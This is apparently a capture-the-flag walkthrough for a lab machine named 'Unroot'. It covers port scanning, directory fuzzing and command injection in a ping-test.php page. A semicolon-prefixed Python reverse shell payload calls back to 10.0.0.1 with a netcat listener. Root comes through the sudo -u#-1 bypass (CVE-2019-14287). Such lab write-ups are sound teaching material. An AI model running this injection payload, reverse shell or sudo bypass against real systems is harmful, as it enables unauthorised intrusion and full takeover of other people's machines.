Unroot

nmap

mkdir nmap
sudo rustscan -a 172.31.1.17 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan

A webserver is open on port 80

Web enumeration

Upon checking in the browser, looks like it is hosting PhpMyAdmin.

I tried to log in using the most common username and passwords for phpMyAdmin, but nothing works so I moved forward to directory busting instead.

ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://172.31.1.17/FUZZ  -ignore-body -recursion -recursion-depth 2 -t 40 -ic -c -o webdir.domain.root -D -e php,html,txt

After a few seconds of running, it has found /dev directory.

There's an interesting file, called ping-test.php.

After some experimentation, I figured the input parameter is vulnerable to Remote Code Execution. You can execute any bash command right after a semicolon (i.e. ;)

Exploitation

First, craft a reverse shell payload with python

; python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",80));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

Set a netcat listener

sudo nc -lvnp 80  

Paste your payload in the input, and right after clicking run. You should have received your initial shell.

Sweet, now we have able to pwn joe user.

Privilege Escalation

Running sudo --version you can see that it is running on version 1.8.16, which is vulnerable to CVE2019-14287.

To gain root, just execute sudo -u#-1 bash

Thanks for reading, and enjoy your day! :D